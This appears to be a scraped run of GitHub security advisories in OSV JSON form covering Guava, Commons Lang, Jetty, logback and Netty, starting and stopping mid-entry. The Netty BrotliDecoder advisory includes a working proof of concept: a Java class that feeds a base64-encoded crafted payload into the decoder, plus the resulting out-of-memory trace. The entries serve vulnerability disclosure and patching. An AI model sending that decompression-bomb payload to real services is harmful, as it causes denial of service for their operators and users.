"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220210-0003"
},
{
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},
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},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E"
},
{
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},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E"
},
{
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{
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},
{
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"url": "https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E"
},
{
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"url": "https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E"
},
{
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"url": "https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E"
},
{
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"url": "https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E"
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{
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"url": "https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E"
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{
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"url": "https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E"
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{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Information Disclosure in Guava"
}
GHSA-J288-Q9X7-2F5V
Vulnerability from github – Published: 2025-07-11 15:31 – Updated: 2025-11-05 20:30Uncontrolled Recursion vulnerability in Apache Commons Lang.
This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.
The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.
Users are recommended to upgrade to version 3.18.0, which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.commons:commons-lang3"
},
"ranges": [
{
"events": [
{
"introduced": "3.0"
},
{
"fixed": "3.18.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "commons-lang:commons-lang"
},
"ranges": [
{
"events": [
{
"introduced": "2.0"
},
{
"last_affected": "2.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48924"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-12T00:48:03Z",
"nvd_published_at": "2025-07-11T15:15:24Z",
"severity": "MODERATE"
},
"details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with\u00a0commons-lang:commons-lang\u00a02.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before\u00a03.18.0.\n\nThe methods ClassUtils.getClass(...) can throw\u00a0StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could\u00a0cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.",
"id": "GHSA-j288-q9x7-2f5v",
"modified": "2025-11-05T20:30:31Z",
"published": "2025-07-11T15:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924"
},
{
"type": "WEB",
"url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/commons-lang"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/07/11/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs"
}
GHSA-Q4RV-GQ96-W7C5
Vulnerability from github – Published: 2025-05-08 19:28 – Updated: 2025-05-08 19:28In Eclipse Jetty versions 9.4.0 to 9.4.56 a buffer can be incorrectly released when confronted with a gzip error when inflating a request body. This can result in corrupted and/or inadvertent sharing of data between requests.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 9.4.56"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.4.0"
},
{
"fixed": "9.4.57.v20241219"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-13009"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-08T19:28:34Z",
"nvd_published_at": "2025-05-08T18:15:41Z",
"severity": "HIGH"
},
"details": "In Eclipse Jetty versions 9.4.0 to 9.4.56 a buffer can be incorrectly released when confronted with a gzip error when inflating a request body. This can result in corrupted and/or inadvertent sharing of data between requests.",
"id": "GHSA-q4rv-gq96-w7c5",
"modified": "2025-05-08T19:28:34Z",
"published": "2025-05-08T19:28:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-q4rv-gq96-w7c5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13009"
},
{
"type": "PACKAGE",
"url": "https://github.com/jetty/jetty.project"
},
{
"type": "WEB",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/48"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "**UNSUPPORTED WHEN ASSIGNED** GzipHandler causes part of request body to be seen as request body of a separate request"
}
GHSA-25QH-J22F-PWP8
Vulnerability from github – Published: 2025-10-01 09:30 – Updated: 2025-10-31 20:17QOS.CH logback-core versions up to 1.5.18 contain an ACE vulnerability in conditional configuration file processing in Java applications. This vulnerability allows an attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting a malicious environment variable before program execution.
A successful attack requires the Janino library and Spring Framework to be present on the user's class path. Additionally, the attacker must have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privileges.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.5.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.16"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-11226"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-21T21:10:11Z",
"nvd_published_at": "2025-10-01T08:15:31Z",
"severity": "MODERATE"
},
"details": "QOS.CH logback-core versions up to 1.5.18 contain an ACE vulnerability in conditional configuration file processing in Java applications. This vulnerability allows an attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting a malicious environment variable before program execution.\n\nA successful attack requires the Janino library and Spring Framework to be present on the user\u0027s class path. Additionally, the attacker must have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privileges.",
"id": "GHSA-25qh-j22f-pwp8",
"modified": "2025-10-31T20:17:45Z",
"published": "2025-10-01T09:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11226"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/issues/974"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7"
},
{
"type": "PACKAGE",
"url": "https://github.com/qos-ch/logback"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/releases/tag/v_1.5.19"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.3.16"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.5.19"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "QOS.CH logback-core is vulnerable to Arbitrary Code Execution through file processing"
}
GHSA-PR98-23F8-JWXV
Vulnerability from github – Published: 2024-12-19 18:31 – Updated: 2025-01-03 19:05ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core up to and including version 1.5.12 in Java applications allows attackers to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution.
Malicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension.
A successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.5.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-12798"
],
"database_specific": {
"cwe_ids": [
"CWE-917"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-19T22:22:09Z",
"nvd_published_at": "2024-12-19T16:15:07Z",
"severity": "MODERATE"
},
"details": "ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core up to and including version 1.5.12 in Java applications allows attackers to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution.\n\nMalicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension.\n\nA successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege.",
"id": "GHSA-pr98-23f8-jwxv",
"modified": "2025-01-03T19:05:25Z",
"published": "2024-12-19T18:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12798"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183"
},
{
"type": "PACKAGE",
"url": "https://github.com/qos-ch/logback"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.3.15"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.5.13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/RE:L/U:Clear",
"type": "CVSS_V4"
}
],
"summary": "QOS.CH logback-core Expression Language Injection vulnerability"
}
GHSA-3P8M-J85Q-PGMJ
Vulnerability from github – Published: 2025-09-03 18:00 – Updated: 2025-09-04 13:51Summary
With specially crafted input, BrotliDecoder and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.
Details
BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.
Tested on 4.1.118, but there were no changes to the decoder since.
PoC
Run this test case with -Xmx1G:
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import java.util.Base64;
public class T {
public static void main(String[] args) {
EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
}
}
Error:
Exception in thread "main" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)
at java.base/java.nio.Bits.reserveMemory(Bits.java:178)
at java.base/java.nio.DirectByteBuffer.<init>(DirectByteBuffer.java:121)
at java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)
at io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)
at io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)
at io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)
at io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)
at io.netty.buffer.PoolArena.allocate(PoolArena.java:137)
at io.netty.buffer.PoolArena.allocate(PoolArena.java:127)
at io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)
at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)
at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)
at io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)
at io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)
at io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)
at io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)
at io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)
at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)
at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)
at io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)
at io.netty.handler.codec.compression.T.main(T.java:11)
Impact
DoS for anyone using BrotliDecoder on untrusted input.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-compression"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.5.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.125.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58057"
],
"database_specific": {
"cwe_ids": [
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-03T18:00:55Z",
"nvd_published_at": "2025-09-04T10:42:32Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nWith specially crafted input, `BrotliDecoder` and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.\n\n### Details\n\n`BrotliDecoder.decompress` has no limit in how often it calls `pull`, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.\n\nTested on 4.1.118, but there were no changes to the decoder since.\n\n### PoC\n\nRun this test case with `-Xmx1G`:\n\n```java\nimport io.netty.buffer.Unpooled;\nimport io.netty.channel.embedded.EmbeddedChannel;\n\nimport java.util.Base64;\n\npublic class T {\n public static void main(String[] args) {\n EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());\n channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode(\"aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=\")));\n }\n}\n```\n\nError:\n\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)\n\tat java.base/java.nio.Bits.reserveMemory(Bits.java:178)\n\tat java.base/java.nio.DirectByteBuffer.\u003cinit\u003e(DirectByteBuffer.java:121)\n\tat java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)\n\tat io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)\n\tat io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)\n\tat io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)\n\tat io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:137)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:127)\n\tat io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)\n\tat io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)\n\tat io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)\n\tat io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)\n\tat io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)\n\tat io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)\n\tat io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)\n\tat io.netty.handler.codec.compression.T.main(T.java:11)\n```\n\n### Impact\n\nDoS for anyone using `BrotliDecoder` on untrusted input.",
"id": "GHSA-3p8m-j85q-pgmj",
"modified": "2025-09-04T13:51:43Z",
"published": "2025-09-03T18:00:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-3p8m-j85q-pgmj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58057"
},
{
"type": "WEB",
"url": "https://github.com/netty/netty/commit/9d804c54ce962408ae6418255a83a13924f7145d"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Netty\u0027s decoders vulnerable to DoS via zip bomb style attack"
}
GHSA-6MJQ-H674-J845
Vulnerability from github – Published: 2023-06-20 16:33 – Updated: 2024-06-24 21:24Summary
The SniHandler can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the SniHandler to allocate 16MB of heap.
Details
